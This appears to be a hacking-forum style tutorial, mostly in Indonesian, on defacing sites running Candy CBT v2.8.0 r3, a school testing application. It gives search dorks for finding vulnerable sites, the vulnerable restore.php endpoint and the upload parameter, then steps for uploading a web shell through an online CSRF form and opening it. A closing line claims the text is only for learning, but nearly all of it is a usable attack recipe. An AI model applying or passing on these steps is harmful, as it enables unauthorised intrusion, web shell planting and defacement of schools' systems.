How To Deface Candy CBT Arbitrary File Upload (AFU)

 

#Author : xLoveSyndrome'z 

#Team : Hacker Patah Hati

#dork : "Support By Candy CBT v2.8.0 r3"

               "Responsive By Image"

                inurl:cbt "login.php"

#exploit : admin/restore.php

#csrf : Crsf online postfile: datafile

#proof Of Concept :

1. cari Target

2.Masukan Exploit :

   http://site.com/admin/restore.php

   Vuln?ada tulisan Fatal Error

3. Masukan target ke csrf online,postfilenya datafile

4. Pilih Shell kalian extensinya bebas

5. Succes upload Shell?ada tulisan data berhasil di restore

6. akses Shell? http://site.com/admin/shellkalian.php

Note : Hanya Untuk pembelajaran!!!